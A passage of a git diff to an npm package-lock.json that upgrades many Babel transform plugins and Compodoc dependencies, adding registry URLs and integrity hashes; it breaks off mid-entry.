+1731,14 @@ } }, "node_modules/@babel/plugin-proposal-private-property-in-object": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-private-property-in-object/-/plugin-proposal-private-property-in-object-7.16.7.tgz", + "integrity": "sha512-rMQkjcOFbm+ufe3bTZLyOfsOUOxyvLXZJCTARhJr+8UMSoZmqTe1K1BgkFcrW37rAchWg57yI69ORxiWvUINuQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-annotate-as-pure": "^7.14.5", - "@babel/helper-create-class-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-create-class-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", "@babel/plugin-syntax-private-property-in-object": "^7.14.5" }, "engines": { @@ -1672,12 +1749,13 @@ } }, "node_modules/@babel/plugin-proposal-unicode-property-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-proposal-unicode-property-regex/-/plugin-proposal-unicode-property-regex-7.16.7.tgz", + "integrity": "sha512-QRK0YI/40VLhNVGIjRNAAQkEHws0cswSdFFjpFyt943YmJIU1da9uW63Iu6NFV6CxTZW5eTDCrwZUstBWgp/Rg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=4" @@ -1850,11 +1928,12 @@ } }, "node_modules/@babel/plugin-transform-arrow-functions": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-arrow-functions/-/plugin-transform-arrow-functions-7.16.7.tgz", + "integrity": "sha512-9ffkFFMbvzTvv+7dTp/66xvZAWASuPD5Tl9LK3Z9vhOmANo6j94rik+5YMBt4CwHVMWLWpMsriIc2zsa3WW3xQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1880,11 +1959,12 @@ } }, "node_modules/@babel/plugin-transform-block-scoped-functions": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoped-functions/-/plugin-transform-block-scoped-functions-7.16.7.tgz", + "integrity": "sha512-JUuzlzmF40Z9cXyytcbZEZKckgrQzChbQJw/5PuEHYeqzCsvebDx0K0jWnIIVcmmDOAVctCgnYs0pMcrYj2zJg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1894,11 +1974,12 @@ } }, "node_modules/@babel/plugin-transform-block-scoping": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-block-scoping/-/plugin-transform-block-scoping-7.16.7.tgz", + "integrity": "sha512-ObZev2nxVAYA4bhyusELdo9hb3H+A56bxH3FZMbEImZFiEDYVHXQSJ1hQKFlDnlt8G9bBrCZ5ZpURZUrV4G5qQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1908,16 +1989,18 @@ } }, "node_modules/@babel/plugin-transform-classes": { - "version": "7.15.4", - "dev": true, - "license": "MIT", - "dependencies": { - "@babel/helper-annotate-as-pure": "^7.15.4", - "@babel/helper-function-name": "^7.15.4", - "@babel/helper-optimise-call-expression": "^7.15.4", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-replace-supers": "^7.15.4", - "@babel/helper-split-export-declaration": "^7.15.4", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-classes/-/plugin-transform-classes-7.16.7.tgz", + "integrity": "sha512-WY7og38SFAGYRe64BrjKf8OrE6ulEHtr5jEYaZMwox9KebgqPi67Zqz8K53EKk1fFEJgm96r32rkKZ3qA2nCWQ==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.16.7", + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-optimise-call-expression": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-replace-supers": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7", "globals": "^11.1.0" }, "engines": { @@ -1928,11 +2011,12 @@ } }, "node_modules/@babel/plugin-transform-computed-properties": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-computed-properties/-/plugin-transform-computed-properties-7.16.7.tgz", + "integrity": "sha512-gN72G9bcmenVILj//sv1zLNaPyYcOzUho2lIJBMh/iakJ9ygCo/hEF9cpGb61SCMEDxbbyBoVQxrt+bWKu5KGw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1942,11 +2026,12 @@ } }, "node_modules/@babel/plugin-transform-destructuring": { - "version": "7.14.7", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.17.3.tgz", + "integrity": "sha512-dDFzegDYKlPqa72xIlbmSkly5MluLoaC1JswABGktyt6NTXSBcUuse/kWE/wvKFWJHPETpi158qJZFS3JmykJg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1956,12 +2041,13 @@ } }, "node_modules/@babel/plugin-transform-dotall-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.16.7.tgz", + "integrity": "sha512-Lyttaao2SjZF6Pf4vk1dVKv8YypMpomAbygW+mU5cYP3S5cWTfCJjG8xV6CFdzGFlfWK81IjL9viiTvpb6G7gQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1971,11 +2057,12 @@ } }, "node_modules/@babel/plugin-transform-duplicate-keys": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.16.7.tgz", + "integrity": "sha512-03DvpbRfvWIXyK0/6QiR1KMTWeT6OcQ7tbhjrXyFS02kjuX/mu5Bvnh5SDSWHxyawit2g5aWhKwI86EE7GUnTw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -1985,12 +2072,13 @@ } }, "node_modules/@babel/plugin-transform-exponentiation-operator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.16.7.tgz", + "integrity": "sha512-8UYLSlyLgRixQvlYH3J2ekXFHDFLQutdy7FfFAMm3CPZ6q9wHCwnUyiXpQCe3gVVnQlHc5nsuiEVziteRNTXEA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-builder-binary-assignment-operator-visitor": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-builder-binary-assignment-operator-visitor": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2000,11 +2088,12 @@ } }, "node_modules/@babel/plugin-transform-for-of": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.16.7.tgz", + "integrity": "sha512-/QZm9W92Ptpw7sjI9Nx1mbcsWz33+l8kuMIQnDwgQBG5s3fAfQvkRjQ7NqXhtNcKOnPkdICmUHyCaWW06HCsqg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2014,12 +2103,14 @@ } }, "node_modules/@babel/plugin-transform-function-name": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.16.7.tgz", + "integrity": "sha512-SU/C68YVwTRxqWj5kgsbKINakGag0KTgq9f2iZEXdStoAbOzLHEBRYzImmA6yFo8YZhJVflvXmIHUO7GWHmxxA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-function-name": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-compilation-targets": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2029,11 +2120,12 @@ } }, "node_modules/@babel/plugin-transform-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-literals/-/plugin-transform-literals-7.16.7.tgz", + "integrity": "sha512-6tH8RTpTWI0s2sV6uq3e/C9wPo4PTqqZps4uF0kzQ9/xPLFQtipynvmT1g/dOfEJ+0EQsHhkQ/zyRId8J2b8zQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2043,11 +2135,12 @@ } }, "node_modules/@babel/plugin-transform-member-expression-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-member-expression-literals/-/plugin-transform-member-expression-literals-7.16.7.tgz", + "integrity": "sha512-mBruRMbktKQwbxaJof32LT9KLy2f3gH+27a5XSuXo6h7R3vqltl0PgZ80C8ZMKw98Bf8bqt6BEVi3svOh2PzMw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2057,12 +2150,13 @@ } }, "node_modules/@babel/plugin-transform-modules-amd": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.16.7.tgz", + "integrity": "sha512-KaaEtgBL7FKYwjJ/teH63oAmE3lP34N3kshz8mm4VMAw7U3PxjVwwUmxEFksbgsNUaO3wId9R2AVQYSEGRa2+g==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-module-transforms": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", "babel-plugin-dynamic-import-node": "^2.3.3" }, "engines": { @@ -2073,13 +2167,14 @@ } }, "node_modules/@babel/plugin-transform-modules-commonjs": { - "version": "7.15.4", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.16.8.tgz", + "integrity": "sha512-oflKPvsLT2+uKQopesJt3ApiaIS2HW+hzHFcwRNtyDGieAeC/dIHZX8buJQ2J2X1rxGPy4eRcUijm3qcSPjYcA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-module-transforms": "^7.15.4", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-simple-access": "^7.15.4", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-simple-access": "^7.16.7", "babel-plugin-dynamic-import-node": "^2.3.3" }, "engines": { @@ -2090,14 +2185,15 @@ } }, "node_modules/@babel/plugin-transform-modules-systemjs": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.16.7.tgz", + "integrity": "sha512-DuK5E3k+QQmnOqBR9UkusByy5WZWGRxfzV529s9nPra1GE7olmxfqO2FHobEOYSPIjPBTr4p66YDcjQnt8cBmw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-hoist-variables": "^7.14.5", - "@babel/helper-module-transforms": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-validator-identifier": "^7.14.5", + "@babel/helper-hoist-variables": "^7.16.7", + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-validator-identifier": "^7.16.7", "babel-plugin-dynamic-import-node": "^2.3.3" }, "engines": { @@ -2108,12 +2204,13 @@ } }, "node_modules/@babel/plugin-transform-modules-umd": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.16.7.tgz", + "integrity": "sha512-EMh7uolsC8O4xhudF2F6wedbSHm1HHZ0C6aJ7K67zcDNidMzVcxWdGr+htW9n21klm+bOn+Rx4CBsAntZd3rEQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-module-transforms": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-module-transforms": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2123,11 +2220,12 @@ } }, "node_modules/@babel/plugin-transform-named-capturing-groups-regex": { - "version": "7.14.9", + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-named-capturing-groups-regex/-/plugin-transform-named-capturing-groups-regex-7.16.8.tgz", + "integrity": "sha512-j3Jw+n5PvpmhRR+mrgIh04puSANCk/T/UA3m3P1MjJkhlK906+ApHhDIqBQDdOgL/r1UYpz4GNclTXxyZrYGSw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2137,11 +2235,12 @@ } }, "node_modules/@babel/plugin-transform-new-target": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.16.7.tgz", + "integrity": "sha512-xiLDzWNMfKoGOpc6t3U+etCE2yRnn3SM09BXqWPIZOBpL2gvVrBWUKnsJx0K/ADi5F5YC5f8APFfWrz25TdlGg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2151,12 +2250,13 @@ } }, "node_modules/@babel/plugin-transform-object-super": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.16.7.tgz", + "integrity": "sha512-14J1feiQVWaGvRxj2WjyMuXS2jsBkgB3MdSN5HuC2G5nRspa5RK9COcs82Pwy5BuGcjb+fYaUj94mYcOj7rCvw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-replace-supers": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-replace-supers": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2166,11 +2266,12 @@ } }, "node_modules/@babel/plugin-transform-parameters": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.16.7.tgz", + "integrity": "sha512-AT3MufQ7zZEhU2hwOA11axBnExW0Lszu4RL/tAlUJBuNoRak+wehQW8h6KcXOcgjY42fHtDxswuMhMjFEuv/aw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2180,11 +2281,12 @@ } }, "node_modules/@babel/plugin-transform-property-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-property-literals/-/plugin-transform-property-literals-7.16.7.tgz", + "integrity": "sha512-z4FGr9NMGdoIl1RqavCqGG+ZuYjfZ/hkCIeuH6Do7tXmSm0ls11nYVSJqFEUOSJbDab5wC6lRE/w6YjVcr6Hqw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2194,9 +2296,10 @@ } }, "node_modules/@babel/plugin-transform-regenerator": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.16.7.tgz", + "integrity": "sha512-mF7jOgGYCkSJagJ6XCujSQg+6xC1M77/03K2oBmVJWoFGNUtnVJO4WHKJk3dnPC8HCcj4xBQP1Egm8DWh3Pb3Q==", "dev": true, - "license": "MIT", "dependencies": { "regenerator-transform": "^0.14.2" }, @@ -2208,11 +2311,12 @@ } }, "node_modules/@babel/plugin-transform-reserved-words": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-reserved-words/-/plugin-transform-reserved-words-7.16.7.tgz", + "integrity": "sha512-KQzzDnZ9hWQBjwi5lpY5v9shmm6IVG0U9pB18zvMu2i4H90xpT4gmqwPYsn8rObiadYe2M0gmgsiOIF5A/2rtg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2249,11 +2353,12 @@ } }, "node_modules/@babel/plugin-transform-shorthand-properties": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.16.7.tgz", + "integrity": "sha512-hah2+FEnoRoATdIb05IOXf+4GzXYTq75TVhIn1PewihbpyrNWUt2JbudKQOETWw6QpLe+AIUpJ5MVLYTQbeeUg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2263,12 +2368,13 @@ } }, "node_modules/@babel/plugin-transform-spread": { - "version": "7.14.6", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-spread/-/plugin-transform-spread-7.16.7.tgz", + "integrity": "sha512-+pjJpgAngb53L0iaA5gU/1MLXJIfXcYepLgXB3esVRf4fqmj8f2cxM3/FKaHsZms08hFQJkFccEWuIpm429TXg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5", - "@babel/helper-skip-transparent-expression-wrappers": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.16.0" }, "engines": { "node": ">=6.9.0" @@ -2278,11 +2384,12 @@ } }, "node_modules/@babel/plugin-transform-sticky-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.16.7.tgz", + "integrity": "sha512-NJa0Bd/87QV5NZZzTuZG5BPJjLYadeSZ9fO6oOUoL4iQx+9EEuw/eEM92SrsT19Yc2jgB1u1hsjqDtH02c3Drw==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2292,11 +2399,12 @@ } }, "node_modules/@babel/plugin-transform-template-literals": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.16.7.tgz", + "integrity": "sha512-VwbkDDUeenlIjmfNeDX/V0aWrQH2QiVyJtwymVQSzItFDTpxfyJh3EVaQiS0rIN/CqbLGr0VcGmuwyTdZtdIsA==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2306,11 +2414,12 @@ } }, "node_modules/@babel/plugin-transform-typeof-symbol": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.16.7.tgz", + "integrity": "sha512-p2rOixCKRJzpg9JB4gjnG4gjWkWa89ZoYUnl9snJ1cWIcTH/hvxZqfO+WjG6T8DRBpctEol5jw1O5rA8gkCokQ==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2320,11 +2429,12 @@ } }, "node_modules/@babel/plugin-transform-unicode-escapes": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-escapes/-/plugin-transform-unicode-escapes-7.16.7.tgz", + "integrity": "sha512-TAV5IGahIz3yZ9/Hfv35TV2xEm+kaBDaZQCn2S/hG9/CZ0DktxJv9eKfPc7yYCvOYR4JGx1h8C+jcSOvgaaI/Q==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2334,12 +2444,13 @@ } }, "node_modules/@babel/plugin-transform-unicode-regex": { - "version": "7.14.5", + "version": "7.16.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.16.7.tgz", + "integrity": "sha512-oC5tYYKw56HO75KZVLQ+R/Nl3Hro9kf8iG0hXoaHP7tjAyCpvqBiSNe6vGrZni1Z6MggmUOC6A7VP7AVmw225Q==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/helper-create-regexp-features-plugin": "^7.14.5", - "@babel/helper-plugin-utils": "^7.14.5" + "@babel/helper-create-regexp-features-plugin": "^7.16.7", + "@babel/helper-plugin-utils": "^7.16.7" }, "engines": { "node": ">=6.9.0" @@ -2443,9 +2554,10 @@ } }, "node_modules/@babel/preset-modules": { - "version": "0.1.4", + "version": "0.1.5", + "resolved": "https://registry.npmjs.org/@babel/preset-modules/-/preset-modules-0.1.5.tgz", + "integrity": "sha512-A57th6YRG7oR3cq/yt/Y84MvGgE0eJG2F1JLhKuyG+jFxEgrd/HAMJatiFtmOiZurz+0DkrvbheCLaV5f2JfjA==", "dev": true, - "license": "MIT", "dependencies": { "@babel/helper-plugin-utils": "^7.0.0", "@babel/plugin-proposal-unicode-property-regex": "^7.4.4", @@ -2481,16 +2593,18 @@ } }, "node_modules/@babel/traverse": { - "version": "7.15.4", - "license": "MIT", - "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.4", - "@babel/helper-function-name": "^7.15.4", - "@babel/helper-hoist-variables": "^7.15.4", - "@babel/helper-split-export-declaration": "^7.15.4", - "@babel/parser": "^7.15.4", - "@babel/types": "^7.15.4", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.17.3.tgz", + "integrity": "sha512-5irClVky7TxRWIRtxlh2WPUUOLhcPN06AGgaQSB8AEwuyEBgJVuJ5imdHm5zxk8w0QS5T+tDfnDxAlhWjpb7cw==", + "dependencies": { + "@babel/code-frame": "^7.16.7", + "@babel/generator": "^7.17.3", + "@babel/helper-environment-visitor": "^7.16.7", + "@babel/helper-function-name": "^7.16.7", + "@babel/helper-hoist-variables": "^7.16.7", + "@babel/helper-split-export-declaration": "^7.16.7", + "@babel/parser": "^7.17.3", + "@babel/types": "^7.17.0", "debug": "^4.1.0", "globals": "^11.1.0" }, @@ -2499,10 +2613,11 @@ } }, "node_modules/@babel/traverse/node_modules/@babel/generator": { - "version": "7.15.8", - "license": "MIT", + "version": "7.17.3", + "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.17.3.tgz", + "integrity": "sha512-+R6Dctil/MgUsZsZAkYgK+ADNSZzJRRy0TvY65T71z/CR854xHQ1EweBYXdfT+HNeN7w0cSJJEzgxZMv40pxsg==", "dependencies": { - "@babel/types": "^7.15.6", + "@babel/types": "^7.17.0", "jsesc": "^2.5.1", "source-map": "^0.5.0" }, @@ -2531,16 +2646,18 @@ }, "node_modules/@babel/traverse/node_modules/source-map": { "version": "0.5.7", - "license": "BSD-3-Clause", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", "engines": { "node": ">=0.10.0" } }, "node_modules/@babel/types": { - "version": "7.15.6", - "license": "MIT", + "version": "7.17.0", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.17.0.tgz", + "integrity": "sha512-TmKSNO4D5rzhL5bjWFcVHHLETzfQ/AmbKpKPOSjlP0WoHZ6L911fgoOKY4Alp/emzG4cHJdyN49zpgkbXFEHHw==", "dependencies": { - "@babel/helper-validator-identifier": "^7.14.9", + "@babel/helper-validator-identifier": "^7.16.7", "to-fast-properties": "^2.0.0" }, "engines": { @@ -2548,43 +2665,46 @@ } }, "node_modules/@compodoc/compodoc": { - "version": "1.1.14", + "version": "1.1.18", + "resolved": "https://registry.npmjs.org/@compodoc/compodoc/-/compodoc-1.1.18.tgz", + "integrity": "sha512-+AFtcj2U3AJq6r8a2+PTdajIlS7m3pgvDhqgoYZJ4Rg/Zp9xvuDvUJU+5oHu8iHCAWwda3NoLUDjOZMNR8uIKg==", "dev": true, "hasInstallScript": true, - "license": "MIT", "dependencies": { - "@babel/core": "^7.14.6", - "@babel/preset-env": "^7.14.7", - "@compodoc/live-server": "^1.2.2", + "@angular-devkit/schematics": "^13.1.2", + "@babel/core": "^7.16.7", + "@babel/preset-env": "^7.16.7", + "@compodoc/live-server": "^1.2.3", "@compodoc/ngd-transformer": "^2.1.0", - "chalk": "^4.1.1", + "chalk": "^4.1.2", "cheerio": "^1.0.0-rc.10", "chokidar": "^3.5.2", - "colors": "^1.4.0", - "commander": "^8.0.0", - "cosmiconfig": "^7.0.0", - "decache": "^4.6.0", - "fancy-log": "^1.3.3", + "colors": "1.4.0", + "commander": "^8.3.0", + "cosmiconfig": "^7.0.1", + "decache": "^4.6.1", + "fancy-log": "^2.0.0", "findit2": "^2.2.3", "fs-extra": "^10.0.0", - "glob": "^7.1.7", + "glob": "^7.2.0", "handlebars": "^4.7.7", "html-entities": "^2.3.2", - "i18next": "^20.3.2", + "i18next": "^21.6.5", "inside": "^1.0.0", "json5": "^2.2.0", "lodash": "^4.17.21", - "loglevel": "^1.7.1", + "loglevel": "^1.8.0", "loglevel-plugin-prefix": "^0.8.4", "lunr": "^2.3.9", - "marked": "^2.1.3", + "marked": "^4.0.9", "minimist": "^1.2.5", "opencollective-postinstall": "^2.0.3", - "os-name": "^4.0.0", - "pdfmake": "^0.2.0", + "os-name": "4.0.1", + "pdfjs-dist": "^2.12.313", + "pdfmake": "^0.2.4", "semver": "^7.3.5", "traverse": "^0.6.6", - "ts-morph": "^11.0.3", + "ts-morph": "^13.0.2", "uuid": "^8.3.2" }, "bin": { @@ -2594,57 +2714,109 @@ "node": ">= 12.0.0" } }, - "node_modules/@compodoc/compodoc/node_modules/@babel/compat-data": { - "version": "7.15.0", + "node_modules/@compodoc/compodoc/node_modules/@ampproject/remapping": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.1.2.tgz", + "integrity": "sha512-hoyByceqwKirw7w3Z7gnIIZC3Wx3J484Y3L/cMpXFbr7d9ZQj2mODrirNzcJa+SM3UlpWXYvKV4RlRpFXlWgXg==", "dev": true, - "license": "MIT", + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.0" + }, "engines": { - "node": ">=6.9.0" + "node": ">=6.0.0" } }, - "node_modules/@compodoc/compodoc/node_modules/@babel/core": { - "version": "7.15.0", + "node_modules/@compodoc/compodoc/node_modules/@angular-devkit/core": { + "version": "13.2.4", + "resolved": "https://registry.npmjs.org/@angular-devkit/core/-/core-13.2.4.tgz", + "integrity": "sha512-hSw1JWA/6dDAF/xleQRXGtzHphfU49TMUhvAoAmsmmz3NAn03xLy1dtqdIXIf+TkFXVvZDaAB2mW8KfRV67GFg==", "dev": true, - "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-module-transforms": "^7.15.0", - "@babel/helpers": "^7.14.8", - "@babel/parser": "^7.15.0", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.1.2", - "semver": "^6.3.0", - "source-map": "^0.5.0" + "ajv": "8.9.0", + "ajv-formats": "2.1.1", + "fast-json-stable-stringify": "2.1.0", + "magic-string": "0.25.7", + "rxjs": "6.6.7", + "source-map": "0.7.3" }, "engines": { - "node": ">=6.9.0" + "node": "^12.20.0 || 